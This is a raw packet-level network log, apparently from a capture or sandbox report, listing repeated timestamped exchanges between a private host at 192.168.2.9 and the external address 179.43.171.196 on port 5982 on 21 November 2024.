                                                                                                                                                              Nov 21, 2024 11:27:06.303435087 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303451061 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303458929 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303463936 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303476095 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303482056 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303488016 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303499937 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303513050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303524971 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303527117 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303538084 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303550959 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303556919 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303564072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303575993 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303589106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303602934 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303611994 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303611994 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303616047 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303628922 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303641081 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303649902 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303653955 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303667068 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303670883 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303682089 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303694010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303699017 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303708076 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303719044 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303719997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303759098 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303906918 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303922892 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303935051 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303970098 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303986073 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304074049 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304088116 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304099083 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304111958 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304122925 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304125071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304137945 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304150105 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304150105 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304162979 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304176092 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304187059 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304191113 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304198980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304210901 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304217100 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304233074 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304239035 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304246902 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304260015 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304269075 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304280996 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304290056 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304299116 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304311037 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304321051 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304322958 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304336071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304347992 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304362059 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304366112 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304373980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304387093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304392099 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304399014 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304410934 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304414988 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304423094 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304435015 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304435015 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304447889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304454088 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304466963 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304481030 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304486990 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304493904 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304507971 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304514885 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304521084 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304533958 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304546118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304550886 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304557085 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304569006 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304582119 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304591894 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304593086 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304599047 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304615974 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304627895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304627895 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304641962 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304650068 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304656029 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304667950 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304668903 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304682970 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304694891 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304699898 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304729939 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.304928064 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304948092 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304961920 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304975033 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.304989100 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.480396032 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.481162071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.481273890 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.481322050 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.482040882 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.482151031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.482198000 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.482990026 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.483068943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.483185053 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.483829975 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.483927965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.483978987 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.484724045 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.485820055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.485865116 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.487517118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487535954 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487550974 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487561941 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487576962 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487586975 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.487591028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.487607002 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.487643957 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.488517046 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.488673925 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.488816023 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.489381075 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.489393950 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.489435911 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.490060091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.490170956 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.490219116 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.490956068 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.491071939 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.491118908 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.491827011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.491931915 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.492247105 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.492686987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.547840118 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.630983114 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.631062031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.631192923 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.631553888 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.631591082 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.631644011 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.632282019 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.632551908 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.632621050 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.632802010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.633646011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.633660078 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.633713961 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.634309053 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.634365082 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.634435892 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.634967089 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.635020018 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.635062933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.635811090 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.635891914 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.644184113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.644201040 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.644330978 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.644387960 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.644501925 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.644562006 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.645575047 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.645596027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.645667076 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.646119118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.646361113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.646408081 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.646440983 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.647351027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.647363901 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.647397995 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.649174929 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.649194956 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.649240971 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.649420977 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.649434090 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.649477005 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.650037050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.650057077 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.650089025 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.650648117 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.650700092 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.650765896 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.651535034 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.651634932 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.651639938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.652389050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.652434111 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.652461052 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.653599977 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.653621912 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.653666973 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.654330969 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.654342890 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.654383898 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.655117035 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.655133009 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.655180931 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.655803919 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.655848980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.655926943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.656730890 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.656780958 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.656791925 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.658103943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.658111095 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.658162117 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.658746004 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.658760071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.658791065 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.659614086 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.659626961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.659688950 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.660231113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.660278082 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.851640940 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.852360010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.852415085 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.852525949 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.853256941 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.853303909 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.853305101 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.854072094 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.854124069 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.854198933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.854943037 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.854986906 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.854999065 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.856014967 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.856066942 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.856141090 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.856729031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.856781960 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.856821060 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.857547998 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.857604980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.857709885 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.858374119 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.858428001 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.858458042 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.859220982 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.859267950 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.859267950 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.860084057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.860137939 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.860178947 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.860987902 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.861044884 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.861197948 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.861876011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.861907005 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.861934900 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.862647057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.862698078 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.862797976 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.863550901 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.863596916 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.863660097 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.864391088 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.864448071 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.864461899 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.865245104 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.865293026 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.865325928 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.866115093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.866163969 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.866215944 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.866988897 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.867053986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.867079973 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.867810011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.867861986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.867913961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.868678093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.868736029 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.868789911 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.869561911 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.869616032 CET497185982192.168.2.9179.43.171.196
